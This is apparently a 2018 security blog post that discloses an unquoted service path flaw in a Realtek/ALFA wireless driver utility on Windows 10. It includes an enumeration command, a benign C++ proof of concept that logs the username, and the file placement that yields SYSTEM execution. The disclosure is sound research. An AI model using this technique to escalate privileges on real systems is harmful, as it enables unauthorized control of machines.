Exploiting Unqoted Service Paths For Fun and No Profit

March 15, 2018
exploit cve windows

This kind of vulnerability is really old. However, vendors still fail to properly address this issue. This is just another example of exploiting this kind of vulnerability on Windows 10 with the most up-to-date ALFA AWUS036AC driver utility (version 1030.6). Note that the download link points to alfa.com but the driver utility itself says it’s developed by REALTEK.

The vulnerability

Upon installing the driver utility, two vulnerable services get installed. This can be checked using the following command:

C:\Users\ps>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Realtek DHCP Service | RTLDHCPService | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RTLDHCP.exe

RealtekWlanU         | RealtekWlanU   | C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility\RtlService.exe

This means, that the service paths of both services, called Realtek DHCP Service and RealtekWlanU, contain spaces and are not quoted using ". Therefore, they are vulnerable to this kind of attack.

A quick C++ PoC that logs the username of the user that executes a certain .exe file looks like this:

char username[UNLEN+1];
DWORD username_len = UNLEN+1;
GetUserName(username, &username_len);

std::ofstream outfile;
outfile.open("C:\\Users\\Public\\userlog.txt", std::ios_base::app);
outfile << username << std::endl;

When executed as a regular user, the binary outputs ps, being a regular user account.

The Exploit

Both service paths share the common string C:\Program Files (x86)\REALTEK\USB Wireless LAN Utility. Note that the substring USB Wireless LAN Utility contains spaces, which is a part of the vulnerability. Exploiting this works by placing a malicious file called USB.exe into C:\Program Files (x86)\REALTEK, making the full path C:\Program Files (x86)\REALTEK\USB.exe. Please not that this can only be performed by administrators in this case. So this will get you a privilege ecscalation from Administrator to SYSTEM ¯\(ツ)/¯. The binary supplied by an attacker will be executed as SYSTEM upon restarting the system. This can be seen for both vulnerable services in the log file:

SYSTEM
SYSTEM

The cause

The string which specifies the service path needs to be quoted to prevent this, as seen in this example

Additional note

While quickly testing this for multiple driver utilities by REALTEK, all tested packages seemed to be “vulnerable”.

Credits

r2con 2019 PwnDebian Challenge: Exploiting radare2 (CVE-2019-14745)

July 30, 2019
r2 radare2 reverse-engineering exploit binary cve

Auditing the Oral-B App (v5.0.0)

January 8, 2018
android cve

Auditing NQ Contacts Backup & Restore 1.1

October 29, 2017
android cve